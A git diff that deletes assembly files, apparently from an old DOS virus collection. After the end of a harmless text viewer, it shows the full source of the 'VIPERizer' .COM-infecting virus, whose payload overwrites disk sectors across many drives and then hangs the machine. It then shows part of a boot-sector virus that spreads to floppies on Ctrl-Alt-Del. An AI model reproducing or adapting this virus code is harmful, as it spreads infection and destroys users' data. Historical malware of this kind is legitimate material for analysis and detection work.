EndSearch ; If not, still in file name - Mov Byte Ptr [SI - 1],0 ; If so, mark end of file name - Jcxz GotFlag ; If slash, check for W - Jmp EndSearch ; Or continue flag search -GotFlag: Lodsb ; Get byte after / flag - Or AL,20h ; Uncapitalize - Cmp AL,'w' ; See if w for WordStar mode - Jnz GotFileEnd ; If not, just ignore it - Mov [WSMode],7Fh ; AND value for WordStar - -; Open the File -; ------------- - -GotFileEnd: Mov Byte Ptr [SI - 1],0 ; Mark end of file name - ; DX still points to name - Mov AX,3D00h ; Open file for reading - Int 21h ; by calling DOS - Jnc GotTheFile ; If no error, continue -NoFileFound: Mov DX,Offset FileFail ; Otherwise print a message - Jmp ErrorExit -GotTheFile: Mov [FileHandle],AX ; Save the file handle - -; Get Screen Mode Information from BIOS Data Area -; ----------------------------------------------- - - Push ES ; Save register - Sub AX,AX - Mov ES,AX ; Set ES to 0 (BIOS Data) - Mov AL,ES:[0449h] ; Current Video Mode - Cmp AL,3 ; Check if Color Alpha - Jbe DisplayOK ; Continue if so - Cmp AL,7 ; Check if monochrome display - Je Monochrome ; If so, branch - Mov DX,Offset ScreenFail ; We can't handle graphics - Jmp ErrorExit ; So print an error message -Monochrome: Mov [ScreenSeg],0B000h ; Use Monochrome Segment - Mov [CheckRetrace],0 ; Don't have to check retrace -DisplayOK: Mov AL,ES:[044Ah] ; Number of Columns - Mov [LineLength],AL ; Save it - Mov AX,ES:[044Eh] ; Offset into screen buffer - Mov [ScreenOff],AX ; Save it - Mov AX,ES:[0463h] ; Address of 6845 Regsiter - Mov [Addr6845],AX ; Save it - Push ES - Sub DL,DL ; Set Rows to zero first - Sub BH,BH - Mov AX,1130h ; EGA BIOS: Get Information - Int 10h - Pop ES - Or DL,DL ; Check if DL is still zero - Jz NoEGA ; If so, skip rest of stuff - Inc DL - Mov [NumberLines],DL ; Save Number of Lines - Test Byte Ptr ES:[0487h],4 ; Check if must check retrace - Jnz NoEGA - Mov [CheckRetrace],0 ; EGA says we don't have to -NoEGA: Mov BH,ES:[0462h] ; Get Current Page (use later) - Pop ES - Mov AL,[LineLength] ; Length of each line - Mul [NumberLines] ; Total chars on screen - Add AX,AX ; Double for attributes - Mov [ScreenSize],AX ; And Save it - -; See if enough memory is left -; ---------------------------- - - Add AX,Offset ScreenHold ; Add ScreenSize to code end - Add AX,256 ; Add a little stack room - Cmp AX,SP ; Check against stack pointer - Jbe GotEnufMemory ; Continue if OK - Mov DX,Offset NoSpaceFail ; Otherwise end program - Jmp ErrorExit ; with error messae - -; Get Current Screen Attribute -; ---------------------------- - -GotEnufMemory: Cmp [Attribute],0 ; Check if attribute pre-set - Jnz GotAttribute ; If so, move on - Mov DL,' ' ; Write out a byte - Mov AH,2 ; using DOS - Int 21h - Mov AL,8 ; Now backspace - Mov AH,14 ; using BIOS call - Int 10h - Mov AH,8 ; Read character & attribute - Int 10h ; using BIOS call (BH = pg) - Mov [Attribute],AH ; And save attribute - -; Save Current Screen -; ------------------- - -GotAttribute: Mov DX,Offset Terminate ; Set Ctrl-Break exit - Mov AX,2523h ; to terminate that way - Int 21h - Mov DI,Offset ScreenHold ; Destination of screen - Mov CX,[ScreenSize] ; Size of screen - Push DS ; Save Source Segment - Lds SI,[ScreenAddr] ; Get screen address - Rep Movsb ; Move in the bytes - Pop DS ; Restore Source Segment - -; Get Keyboard Key and Decide on Action -; ------------------------------------- - - Call Home ; Read file in - Mov [ScreenStart],SI ; Set buffer address -KeyLoop: Call UpDateScreen ; Write file to screen -GetKey: Mov AH,8 ; Get key - Int 21h ; by calling DOS - Cmp AL,27 ; Check if ESC - Je Terminate ; If so, terminate - Cmp AL,0 ; Check if extended - Jnz GetKey ; If not, try again - Mov AH,8 ; Get extended code - Int 21h ; by calling DOS - Sub AL,71 ; Subtract Home key value - Jb GetKey ; If below that, not valid - Cmp AL,(81 - 71) ; Check if above PgDn - Ja GetKey ; If so, ignore it - Sub AH,AH ; Zero out top byte - Add AX,AX ; Double for word access - Mov BX,AX ; Offset in dispatch table - Mov SI,[ScreenStart] ; Set current buffer pointer - Call [Dispatch + BX] ; Do the call - Mov [ScreenStart],SI ; Set new buffer pointer - Jmp KeyLoop ; And update the screen - -; Terminate -- Restore screen and close file -; ------------------------------------------ - -Terminate: Mov SI,Offset ScreenHold ; Address of Saved Screen - Les DI,[ScreenAddr] ; Address of Display - Mov CX,[ScreenSize] ; Number of characters - Rep Movsb ; Move them back - Mov BX,[FileHandle] ; Get File Handle - Mov AH,3Eh ; Close File - Int 21h - Int 20h ; Terminate - -; Cursor Key Routines -- Home Key -; ------------------------------- - -Home: Sub BX,BX ; For zeroing out values - Mov AX,[FileOffset] ; Check if read in file - Or AX,[FileOffset + 2] - Mov [FileOffset],BX ; Zero out file address - Mov [FileOffset + 2],BX - Mov [HorizOffset],BX ; Zero out horizontal offset - Mov SI,Offset Buffer ; Reset buffer pointer - Jz Dummy ; Skip file read if in already - Mov DX,Offset Buffer ; Area to read file in - Mov CX,32768 ; Number of bytes to read - Call FileRead ; Read in file -Dummy: Ret - -; Up and PgUp Keys -; ---------------- - -Up: Call GetPrevChar ; Get previous char in buffer - Jc UpDone ; If none available, finish -UpLoop: Call GetPrevChar ; Get previous char again - Jc UpDone ; if none, we're done - Cmp AL,10 ; Check if line feed - Jnz UpLoop ; If not, try again - Call GetNextChar ; Get char after line feed -UpDone: Ret - -PgUp: Mov CX,Word Ptr [NumberLines] ; Number of lines -PgUpLoop: Call Up ; Do UP that many times - Loop PgUpLoop - Ret - -; Left and Right Keys -; ------------------- - -Left: Mov [HorizOffset],0 ; Reset Horizontal Offset - Ret - -Right: Mov AL,[ShiftHoriz] ; Get places to shift - Sub AH,AH - Add [HorizOffset],AX ; Move that many right - Ret - -; End, Down, and PgDn Keys -; ------------------------ - -End: Mov BX,SI ; Save buffer pointer - Call PgDn ; Go page down - Cmp BX,SI ; Check if we did so - Jnz End ; If so, do it again - Ret - -Down: Call GetNextChar ; Get next character - Jc NoMoreDown ; If no more, we're done -DownLoop: Call GetNextChar ; Get one again - Jc UpLoop ; If no more, find prev LF - Cmp AL,10 ; See if line feed - Jnz DownLoop ; If not, continue -NoMoreDown: Ret - -PgDn: Mov CX,Word Ptr [NumberLines] ; Number of lines -PgDnLoop: Call Down ; Do DOWN that many times - Loop PgDnLoop - Ret - -; Update Screen -; ------------- - -UpdateScreen: Push ES - Mov SI,[ScreenStart] ; Address of data in buffer - Les DI,[ScreenAddr] ; Address of display - Mov CX,ScreenSize ; Number of bytes in screen - Shr CX,1 ; Half for number of chars - Mov AL,' ' ; Will blank screen - Mov AH,[Attribute] ; With screen attribute - Rep Stosw ; Blank it - Mov AL,[LineLength] ; Length of display line - Sub AH,AH - Add AX,[HorizOffset] ; Add Horizontal Offset - Mov [RightMargin],AX ; That's right display margin - Sub DL,DL ; Line Number -LineLoop: Sub BX,BX ; Column Number - Mov AL,[LineLength] ; Use Line Length - Mul DL ; and Line Number - Add AX,AX ; to recalculate - Mov DI,AX ; display destination - Add DI,[ScreenOff] ; Add beginning address -CharLoop: Call GetNextChar ; Get next character - Jc EndOfScreen ; If no more, we're done - And AL,[WSMode] ; Will be 7Fh for WordStar - Cmp AL,13 ; Check for carriage return - Je CharLoop ; Do nothing if so - Cmp AL,10 ; Check for line feed - Je LineFeed ; Do routine if so - Cmp AL,9 ; Check for tab - Je Tab ; Do routine if so - Mov CX,1 ; Just 1 char to display -PrintChar: Cmp BX,[HorizOffset] ; See if we can print it - Jb NoPrint - Cmp BX,[RightMargin] ; See if within margin - Jae NoPrint - Mov AH,[Attribute] ; Attribute for display - Cmp [CheckRetrace],0 ; See if must stop snow - Jz WriteIt ; If not, skip retrace wait - Push BX - Push DX - Mov BX,AX ; Save character and attribute - Mov DX,[Addr6845] ; Set up I/O address - Add DX,6 -RetraceWait1: In AL,DX ; Check until - Shr AL,1 ; vertical retrace - Jc RetraceWait1 ; ends - Cli ; Clear interrupts -RetraceWait2: In AL,DX ; Check until - Shr AL,1 ; vertical retrace - Jnc RetraceWait2 ; begins - Mov AX,BX ; Get back character & attr - Stosw ; Write to display - Sti ; Enable interrupts again - Pop DX - Pop BX - Jmp Short NoPrint ; Skip around "no snow" write -WriteIt: Stosw ; Write without retrace wait -NoPrint: Inc BX ; Bump up line counter - Loop PrintChar ; Do it CX times - Jmp CharLoop ; Then go back to top -Tab: Mov AX,BX ; Current column number - And AX,07h ; Take lower three bits - Mov CX,8 - Sub CX,AX ; Subtract from 8 - Mov AL,' ' ; Will print CX blanks - Jmp PrintChar -LineFeed: Inc DL ; Next line - Cmp DL,[NumberLines] ; See if down at bottom - Jb LineLoop ; If not, continue -EndOfScreen: Pop ES ; All done -- leave - Ret - -; Get Next Character from buffer -; ------------------------------ -; (Input is SI pointing to buffer, Returns AL, CY if no more) - -GetNextChar: Cmp SI,[EndOfFile] ; See if at end of file - Jae NoMoreNext ; If so, no more chars - Cmp SI,Offset BufferEnd ; See if at end of buffer - Jb CanGetNext ; If not, just get character - Push CX ; Otherwise save registers - Push DX - Push DI - Push ES - Push DS ; Set ES to DS - Pop ES ; (could be different) - Mov SI,Offset BufferMid ; Move 2nd buffer half - Mov DI,Offset Buffer ; to 1st buffer half - Mov CX,16384 - Sub [ScreenStart],CX ; New buffer pointer - Rep Movsb ; Move them - Mov SI,DI ; SI also buffer pointer - Add [FileOffset],32768 ; Adjust file addr to read - Adc [FileOffset + 2],0 - Mov DX,Offset BufferMid ; Place to read file - Mov CX,16384 ; Number of bytes - Call FileRead ; Read the file - Sub [FileOffset],16384 ; Now adjust so reflects - Sbb [FileOffset + 2],0 ; 1st half of buffer - Pop ES ; Get back registers - Pop DI - Pop DX - Pop CX - Jmp GetNextChar ; And try again to get char -CanGetNext: Lodsb ; Get the character -NoMoreNext: Cmc ; So CY set if no more - Ret - -; Get Previous Character from buffer -; ---------------------------------- - -GetPrevChar: Cmp SI,Offset Buffer ; See if at top of buffer - Ja CanGetPrev ; If not, just get character - Mov AX,[FileOffset] ; See if at top of file - Or AX,[FileOffset + 2] - Jz AtTopAlready ; If so, can't get anymore - Push CX ; Save some registers - Push DX - Mov SI,Offset Buffer ; Move 1st half of buffer - Mov DI,Offset BufferMid ; to 2nd half of buffer - Mov CX,16384 - Add [ScreenStart],CX ; New buffer pointer - Rep Movsb ; Do the move - Sub [FileOffset],16384 ; Adjust file addr for read - Sbb [FileOffset + 2],0 - Mov DX,Offset Buffer ; Area to read file into - Mov CX,16384 ; Number of bytes - Call FileRead ; Read the file - Pop DX ; Get back registers - Pop CX - Jmp Short CanGetPrev ; Now get character -AtTopAlready: Stc ; CY flag set for no more - Ret -CanGetPrev: Dec SI ; Move pointer back - Mov AL,[SI] ; Get the character - Clc ; CY flag reset for success - Ret - -; Read CX bytes from the file into DX buffer -; ------------------------------------------ - -FileRead: Push AX ; Save some registers - Push BX - Push CX - Push DX - Mov [EndOfFile],-1 ; Initialize this - Mov DX,[FileOffset] ; Get file address to read - Mov CX,[FileOffset + 2] - Mov BX,[FileHandle] ; Get file Handle - Sub AL,AL ; Do LSEEK from beginning - Mov AH,42h ; LSEEK call - Int 21h - Pop DX ; Get back destination - Pop CX ; Get back count - Mov AH,3Fh ; Read file function call - Int 21h - Jnc NoReadError ; If no error, continue - Sub AX,AX ; Otherwise read zero bytes -NoReadError: Cmp AX,CX ; See if 32K has been read - Je GotItAll ; If so, we're home free - Add AX,DX ; Otherwise add to buffer addr - Mov [EndOfFile],AX ; And save as end of file -GotItAll: Pop BX - Pop AX - Ret - -; File Buffer and Screen Hold Areas -; --------------------------------- - -Buffer Label Byte ; Area for file reads -BufferMid equ Buffer + 16384 ; Halfway through it -BufferEnd equ BufferMid + 16384 ; At end of it -ScreenHold equ BufferEnd ; Area for holding screen -CSEG EndS ; End of segment - End Entry ; Denotes entry point - \ No newline at end of file diff --git a/b/BUSH (30).ASM b/b/BUSH (30).ASM deleted file mode 100755 index 087b3e9..0000000 --- a/b/BUSH (30).ASM +++ /dev/null @@ -1,413 +0,0 @@ -; -; VIPERizer, Strain B -; Copyright (c) 1992, Stingray/VIPER -; This is a Viral Inclined Programming Experts Ring Programming Team Production -; -; VIPER are: Stingray, Venom, and Guido Sanchez -; - -MOV_CX MACRO X ; Here is just a simple "mov cx,xxxx" macro. - DB 0B9H - DW X -ENDM - -CODE SEGMENT - ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE - ORG $+0100H - -VCODE: JMP virus - - NOP ; just a dud for the 'infected' file. - -v_start equ $ - - -virus: PUSH CX - mov ax,0ff0fh ; Thanks to RABID... Change Mem Marker - int 21h - cmp ax,101h ; Is VirexPC/FluShit in memory? - jne more_virus ; Nope. - jmp quit ; FUCK!!!!! -more_virus: - MOV DX,OFFSET vir_dat ;This is where the virus data starts. - ; The 2nd and 3rd bytes get modified. - CLD ;Pointers will be auto INcremented - MOV SI,DX ;Access data as offset from SI - ADD SI,first_3 ;Point to original 1st 3 bytes of .COM - MOV DI,OFFSET 100H ;`cause all .COM files start at 100H - mov cx,3 - REPZ MOVSB ;Restore original first 3 bytes of .COM - MOV SI,DX ;Keep SI pointing to the data area - - MOV AH,30H - INT 21H - nop - CMP AL,0 ;0 means it's version 1.X - JNZ dos_ok ;For version 2.0 or greater - JMP quit ;Don't try to infect version 1.X -dos_ok: - mov ah,2ch ; Get Time - int 21h ; Do it. - xor bx,bx ; VIPERize bx, for later use. - cmp dl,4 ; hund's of seconds 4? - jle print_message ; If 4 or less, print a message. - ; This serves as a random 1 in 20 - ; chance of the message printing - jmp short get_date ; No? What date is it...? -print_message: - mov dl, byte ptr [si+msg+bx] ; Get a byte of our message... - or dl,dl ; is it 0? (end of message) - jz get_date ; Get the date if it is... - sub dl,75 ; Unencrypt message - mov ah,2 ; Prepare to print one letter - int 21h ; do it! - inc bx ; point to next character. - jmp short print_message ; Do it again. -get_date: - mov ah,2ah ; What day is it? - int 21h ; Find out. - cmp dh,3 ; Is it february? - jne resume ; No? Oh well. - cmp dl,24 ; Is it valentines day? - jne resume ; No? Damn. - mov ah,2ch ; What time is it? - int 21h ; Find out. - cmp ch,7 ; Is it 7 hours? - jne resume ; No? C'est la vie... - cmp cl,45 ; Is it 45 minutes? - jne resume ; No? Too Bad... - xor bx,bx ; VIPERize bx -cool: - mov dl,byte ptr [si+msg2+bx] ; This is pretty much the - or dl,dl ; same as the above 'print' - jz no_mas ; function. except I didn't - sub dl,75 ; make it a procedure. - mov ah,2 - int 21h - inc bx - jmp short cool -no_mas: - mov al,0 ; Start with drive default -phri: - mov cx,255 ; Nuke a few sectors - mov dx,1 ; Beginning with sector 1!!! - int 26h ; VIPERize them!!!! Rah!!! - jc error ; Uh oh. Problem. - add sp,2 ; Worked great. Clear the stack... -error: - inc al ; Get another drive! - cmp al,200 ; Have we fried 200 drives? - je done_phrying ; Yep. - jmp short phri ; Nope. -done_phrying: - cli ; Disable Interrupts - hlt ; Lock up computer. -resume: - PUSH ES - MOV AH,2FH - INT 21H - nop - MOV [SI+old_dta],BX - MOV [SI+old_dts],ES ;Save the DTA address - POP ES - MOV DX,dta ;Offset of new DTA in virus data area - nop - ADD DX,SI ;Compute DTA address - MOV AH,1AH - INT 21H ;Set new DTA to inside our own code - nop - PUSH ES - PUSH SI - MOV ES,DS:2CH - MOV DI,0 ;ES:DI points to environment -find_path: - POP SI - PUSH SI ;Get SI back - ADD SI,env_str ;Point to "PATH=" string in data area - LODSB - nop - MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long - REPNZ SCASB ;Search for first character - MOV CX,4 -check_next_4: - LODSB - SCASB - JNZ find_path ;If not all there, abort & start over - nop - LOOP check_next_4 ;Loop to check the next character - POP SI - POP ES - nop - MOV [SI+path_ad],DI ;Save the address of the PATH - MOV DI,SI - ADD DI,wrk_spc ;File name workspace - nop - MOV BX,SI ;Save a copy of SI - ADD SI,wrk_spc ;Point SI to workspace - MOV DI,SI ;Point DI to workspace - JMP SHORT slash_ok -set_subdir: - CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? - JNZ found_subdir ;If not, there are more subdirectories - JMP all_done ;Else, we're all done -found_subdir: - PUSH DS - PUSH SI - MOV DS,ES:2CH ;DS points to environment segment - nop - MOV DI,SI - MOV SI,ES:[DI+path_ad] ;SI = PATH address - ADD DI,wrk_spc ;DI points to file name workspace -move_subdir: - LODSB ;Get character - CMP AL,';' ;Is it a ';' delimiter? - JZ moved_one ;Yes, found another subdirectory - nop - CMP AL,0 ;End of PATH string? - JZ moved_last_one ;Yes - STOSB ;Save PATH marker into [DI] - JMP SHORT move_subdir -moved_last_one: - xor si,si -moved_one: - POP BX ;Pointer to virus data area - POP DS ;Restore DS - MOV [BX+path_ad],SI ;Address of next subdirectory - NOP - CMP CH,'\' ;Ends with "\"? - nop - JZ slash_ok ;If yes - MOV AL,'\' ;Add one, if not - STOSB -slash_ok: - MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace - MOV SI,BX ;Restore SI - ADD SI,f_spec ;Point to "*.COM" - MOV CX,6 - nop - REPZ MOVSB ;Move "*.COM",0 to workspace - MOV SI,BX - MOV AH,4EH - MOV DX,wrk_spc - ADD DX,SI ;DX points to "*.COM" in workspace - MOV CX,3 ;Attributes of Read Only or Hidden OK - INT 21H - nop - JMP SHORT find_first -find_next: - MOV AH,4FH - INT 21H - nop -find_first: - JNB found_file ;Jump if we found it - JMP SHORT set_subdir ;Otherwise, get another subdirectory -found_file: - MOV AX,[SI+dta_tim] ;Get time from DTA - AND AL,1FH ;Mask to remove all but seconds - CMP AL,1FH ;62 seconds -> already infected - JZ find_next ;If so, go find another file - CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? - nop - JA find_next ;If too long, find another one - CMP WORD PTR [SI+dta_len],0AH ;Is it too short? - JB find_next ;Then go find another one - MOV DI,[SI+nam_ptr] ;DI points to file name - PUSH SI ;Save SI - ADD SI,dta_nam ;Point SI to file name -more_chars: - LODSB - STOSB - CMP AL,0 - JNZ more_chars ;Move characters until we find a 00 - POP SI - MOV AX,OFFSET 4300H - nop - MOV DX,wrk_spc ;Point to \path\name in workspace - ADD DX,SI - INT 21H - nop - MOV [SI+old_att],CX ;Save the old attributes - MOV AX,OFFSET 4301H ;Set attributes - AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird) - nop - MOV DX,wrk_spc ;Offset of \path\name in workspace - ADD DX,SI ;Point to \path\name - INT 21H - nop - MOV AX,OFFSET 3D02H ;Read/Write - nop - MOV DX,wrk_spc ;Offset to \path\name in workspace - ADD DX,SI ;Point to \path\name - INT 21H - nop - JNB opened_ok ;If file was opened OK - JMP fix_attr ;If it failed, restore the attributes - -opened_ok: - MOV BX,AX - MOV AX,OFFSET 5700H - INT 21H - nop - MOV [SI+old_tim],CX ;Save file time - MOV [SI+ol_date],DX ;Save the date - MOV AH,3FH - nop - MOV CX,3 - MOV DX,first_3 - ADD DX,SI - INT 21H ;Save first 3 bytes into the data area - nop - JB fix_time_stamp ;Quit, if read failed - CMP AX,3 ;Were we able to read all 3 bytes? - JNZ fix_time_stamp ;Quit, if not - MOV AX,OFFSET 4202H - xor cx,cx - xor dx,dx - INT 21H - nop - JB fix_time_stamp ;Quit, if it didn't work - MOV CX,AX ;DX:AX (long int) = file size - SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here) - MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction - nop - ADD CX,OFFSET c_len_y - MOV DI,SI ;Point DI to virus data area - SUB DI,OFFSET c_len_x - ;Point DI to reference vir_dat, at start of pgm - MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm - MOV AH,40H - MOV_CX virlen ;Length of virus, in bytes - nop - MOV DX,SI - SUB DX,OFFSET codelen ;Length of virus code, gives starting - ; address of virus code in memory - INT 21H - nop - JB fix_time_stamp ;Jump if error - CMP AX,OFFSET virlen ;All bytes written? - JNZ fix_time_stamp ;Jump if error - MOV AX,OFFSET 4200H - xor cx,cx - xor dx,dx - INT 21H - nop - JB fix_time_stamp ;Jump if error - MOV AH,40H - MOV CX,3 - nop - MOV DX,SI ;Virus data area - ADD DX,jmp_op ;Point to the reconstructed JMP - INT 21H - nop -fix_time_stamp: - MOV DX,[SI+ol_date] ;Old file date - nop - MOV CX,[SI+old_tim] ;Old file time - AND CX,OFFSET 0FFE0H - nop - OR CX,1FH ;Seconds = 31/30 min = 62 seconds - MOV AX,OFFSET 5701H - INT 21H - nop - MOV AH,3EH - INT 21H - nop -fix_attr: - MOV AX,OFFSET 4301H - MOV CX,[SI+old_att] ;Old Attributes - nop - MOV DX,wrk_spc - ADD DX,SI ;DX points to \path\name in workspace - INT 21H - nop -all_done: - PUSH DS - MOV AH,1AH - MOV DX,[SI+old_dta] - nop - MOV DS,[SI+old_dts] - INT 21H - nop - POP DS - nop -quit: - POP CX - XOR AX,AX - XOR BX,BX - xor cx,cx - XOR DX,DX - XOR SI,SI - MOV DI,OFFSET 0100H - PUSH DI - XOR DI,DI - RET 0FFFFH -vir_dat EQU $ -olddta_ DW 0 ;Old DTA offset -olddts_ DW 0 ;Old DTA segment -oldtim_ DW 0 ;Old Time -oldate_ DW 0 ;Old date -oldatt_ DW 0 ;Old file attributes -first3_ EQU $ - INT 20H - NOP -jmpop_ DB 0E9H ;Start of JMP instruction -jmpdsp_ DW 0 ;The displacement part -fspec_ DB '*.COM',0 -pathad_ DW 0 ;Path address -namptr_ DW 0 ;Pointer to start of file name -envstr_ DB 'PATH=' ;Find this in the environment -wrkspc_ DB 40h dup (0) -dta_ DB 16h dup (0) ;Temporary DTA goes here -dtatim_ DW 0,0 ;Time stamp in DTA -dtalen_ DW 0,0 ;File length in the DTA -dtanam_ DB 0Dh dup (0) ;File name in the DTA -reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0 - -_msg db 158,186,189,189,196,107,191,179,180,190,107,174,186,184,187,192 - db 191,176,189,107,180,190,107,185,186,107,183,186,185,178,176,189 - db 107,186,187,176,189,172,191,180,186,185,172,183,107,175,192,176 - db 107,191,186,107,172,185,107,186,192,191,173,189,176,172,182,107 - db 186,177,088,141,192,190,179,180,190,179,180,189,186,088,147,172 - db 193,176,107,172,107,153,148,142,144,107,175,172,196,121,121,121 - db 088 - db 0 - -_msg2 db 161,148,155,144,157,180,197,176,189,119,107,158,191,189,172,180 - db 185,107,141,085,088 - db 115,174,116,107,124,132,132,125,119,107,158,191,180,185,178,189 - db 172,196,122,161,148,155,144,157,085,088 - db 147,172,187,187,196,107,161,172,183,176,185,191,180,185,176,190 - db 107,143,172,196,108,085,088 - db 0 - - -lst_byt EQU $ ;All lines that assemble into code are - ; above this one - -virlen = lst_byt - v_start ;Length, in bytes, of the entire virus -codelen = vir_dat - v_start ;Length of virus code, only -c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code -c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP -old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset -old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment -old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp -ol_date = oldate_ - vir_dat ;Displacement to old file date stamp -old_att = oldatt_ - vir_dat ;Displacement to old attributes -first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM -jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode -jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP -f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string -path_ad = pathad_ - vir_dat ;Displacement to the path address -nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer -env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string -wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace -dta = dta_ - vir_dat ;Displacement to the temporary DTA -dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA -dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA -dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA -reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code -msg = _msg - vir_dat ; Disp. to 1st msg -msg2 = _msg2 - vir_dat ; Disp. to 2nd msg - CODE ENDS -END VCODE - \ No newline at end of file diff --git a/c/C-A-D (32).ASM b/c/C-A-D (32).ASM deleted file mode 100755 index 5831a94..0000000 --- a/c/C-A-D (32).ASM +++ /dev/null @@ -1,431 +0,0 @@ -;****************************************************************************; -; ; -; -=][][][][][][][][][][][][][][][=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] [=- ; -; -=] For All Your H/P/A/V Files [=- ; -; -=] SysOp: Peter Venkman [=- ; -; -=] [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=][][][][][][][][][][][][][][][=- ; -; ; -; *** NOT FOR GENERAL DISTRIBUTION *** ; -; ; -; This File is for the Purpose of Virus Study Only! It Should not be Passed ; -; Around Among the General Public. It Will be Very Useful for Learning how ; -; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; -; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; -; Experience can Turn it Into a far More Malevolent Program Than it Already ; -; Is. Keep This Code in Responsible Hands! ; -; ; -;****************************************************************************; -;-----------------------------------------------------------------------; -; This virus is of the ?FLOPPY ONLY? variety. ; -; It replicates to the boot sector of a floppy disk and when it gains control -; it will move itself to upper memory. It redirects the keyboard ; -; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; -; it will attempt to infect any floppy it finds in drive A:. ; -; It keeps the real boot sector at track 39, sector 8, head 0 ; -; It does not map this sector bad in the fat (unlike the Pakistani Brain) -; and should that area be used by a file, the virus ; -; will die. It also contains no anti detection mechanisms as does the ; -; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; -; sector 9 because this is common to all floppy formats both single ; -; sided and double sided. It does not contain any malevolent TROJAN ; -; HORSE code. It does appear to contain a count of how many times it ; -; has infected other diskettes although this is harmless and the count ; -; is never accessed. ; -; ; -; Things to note about this virus: ; -; It can not only live through an ALT-CTRL-DEL reboot command, but this ; -; is its primary (only for that matter) means of reproduction to other ; -; floppy diskettes. The only way to remove it from an infected system ; -; is to turn the machine off and reboot an uninfected copy of DOS. ; -; It is even resident when no floppy is booted but BASIC is loaded ; -; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; -; it activates and infectes the floppy from which the user is ; -; attempting to boot. ; -; ; -; Also note that because of the POP CS command to pass control to ; -; its self in upper memory, this virus does not to work on 80286 ; -; machines (because this is not a valid 80286 instruction). ; -; ; -; If your assembler will not allow the POP CS command to execute, replace; -; the POP CS command with an NOP and then assemble it, then debug that ; -; part of the code and place POP CS in place of NOP at that section. ; -; ; -; The Norton Utilities can be used to identify infected diskettes by ; -; looking at the boot sector and the DOS SYS utility can be used to ; -; remove it (unlike the Pakistani Brain). ; -;-----------------------------------------------------------------------; - ; - ORG 7C00H ; - ; -TOS LABEL WORD ;TOP OF STACK -;-----------------------------------------------------------------------; -; 1. Find top of memory and copy ourself up there. (keeping same offset); -; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; -; 3. Redirect int 9 (keyboard) to ourself in top of memory ; -; 4. Jump to ourself at top of memory ; -; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; -;-----------------------------------------------------------------------; -BEGIN: CLI ;INITIALIZE STACK - XOR AX,AX ; - MOV SS,AX ; - MOV SP,offset TOS ; - STI ; - ; - MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) - MOV DS,BX ; - MOV AX,[0013H] ; - MUL BX ; - SUB AX,07E0H ; (7C00H+512)/16 - MOV ES,AX ; - ; - PUSH CS ;DS = CS - POP DS ; - ; - CMP DI,3456H ;IF THE VIRUS IS REBOOTING... - JNE B_10 ; - DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- - ; -B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY - MOV DI,SI ; - MOV CX,512 ; - CLD ; - REP MOVSB ; - ; - MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO - MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE - MOV CX,128 ; - REP MOVSB ; - ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - ; - PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH - POP CS - ; - PUSH DS ;DS=0 ; ES = DS - POP ES ; - ; - MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 - MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 - MOV CX,2708H ; TRACK 40, SECTOR 8 - MOV AX,0201H ; READ SECTOR - INT 13H ; (common to 8/9 sect. 1/2 sided!) - JB $ ; HANG IF ERROR - ; - JMP JMP_BOOT ;JMP 0000:7C00 - ; -;-----------------------------------------------------------------------; -; SAVE THEN REDIRECT INT 9 VECTOR ; -; ; -; ON ENTRY: DS = 0 ; -; ES = WHERE TO SAVE OLD_09 & (HI) ; -; WHERE NEW_09 IS (HI) ; -;-----------------------------------------------------------------------; -PUT_NEW_09: ; - DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 - ; - MOV SI,9*4 ;COPY INT 9 VECTOR TO - MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) - MOV CX,0004 ; - ; - CLI ; - REP MOVSB ; - MOV Word Ptr [9*4],offset NEW_09 - MOV [(9*4)+2],ES ; - STI ; - ; - RET ; - ; -;-----------------------------------------------------------------------; -; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; -;-----------------------------------------------------------------------; 